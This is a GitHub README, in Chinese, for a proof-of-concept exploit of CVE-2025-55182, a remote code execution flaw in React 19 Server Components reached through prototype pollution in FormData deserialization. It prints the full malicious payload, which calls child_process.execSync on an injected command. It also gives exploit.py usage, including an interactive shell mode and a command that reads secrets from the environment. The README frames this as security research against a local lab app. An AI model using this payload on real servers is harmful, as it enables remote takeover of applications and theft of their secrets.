joaovicdev/EXPLOIT-CVE-2025-55182

GitHub: joaovicdev/EXPLOIT-CVE-2025-55182

CVE-2025-55182 的概念验证工具,通过构造恶意 FormData 载荷实现对 React 19.x 服务器组件的远程代码执行。

Stars: 0 | Forks: 0

# CVE-2025-55182 概念验证 ![CVE-2025-55182](https://img.shields.io/badge/CVE-2025--55182-critical) ![React](https://img.shields.io/badge/React-19.0.0-red) ## 概述 **CVE-2025-55182 (React2Shell)** 的实际演示——React Server Components 中的关键 RCE 漏洞。 ## 漏洞详情 - **CVE ID**: CVE-2025-55182 - **类型**: 通过原型污染实现远程代码执行 - **CVSS**: 9.8(严重) - **受影响版本**: React 19.0.0、19.1.0、19.1.1、19.2.0 ### 攻击向量 React Server Components 不安全地反序列化 FormData。精心构造的 multipart 字段会触发原型污染,并通过 `child_process.execSync` 执行任意代码。 ## 快速设置 ``` npm install pip3 install requests npm run dev ``` 应用程序运行在:**http://localhost:3000** ## 利用方法 ### 基本用法 ``` python3 exploit.py -c "whoami" ``` ### 命令示例 ``` python3 exploit.py -c "whoami" python3 exploit.py -c "pwd" python3 exploit.py -c "ls -la" python3 exploit.py -c "cat package.json" python3 exploit.py -c "env | grep SECRET" ``` ### 交互模式 ``` python3 exploit.py -i ``` ``` > whoami COMMAND RESULT: your-username ============================================================ > pwd COMMAND RESULT: /path/to/project ============================================================ > exit ``` ## 工作原理 ### 载荷结构 ``` { "then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": { "_prefix": "var res=process.mainModule.require('child_process').execSync('CMD',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});", "_chunks": "$Q2", "_formData": {"get": "$1:constructor:constructor"} } } ``` ## 测试 ### 终端 1:启动服务器 ``` npm run dev ``` ### 终端 2:运行漏洞利用 ``` python3 exploit.py -c "whoami" ``` ### 详细模式 ``` python3 exploit.py -c "whoami" -v ``` 显示完整的载荷结构和服务器响应 ## 参考资料 - [CVE-2025-55182 - NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-55182) - [React 安全](https://github.com/facebook/react/security) - [OWASP 反序列化](https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data) **作者:Guaxinim** | 网络安全研究
标签:CISA项目, CVE, CVSS, Exploit, FormData, GNU通用公共许可证, HTTP工具, MITM代理, Node.js, PoC, Prototype Pollution, Python, RCE, React, React Server Components, Syscalls, 事件响应, 代码生成, 原型污染, 恶意Payload, 数字签名, 数据可视化, 数据展示, 无后门, 无线安全, 暴力破解, 渗透测试工具, 漏洞复现, 红队, 编程工具, 网络安全, 远程代码执行, 逆向工具, 隐私保护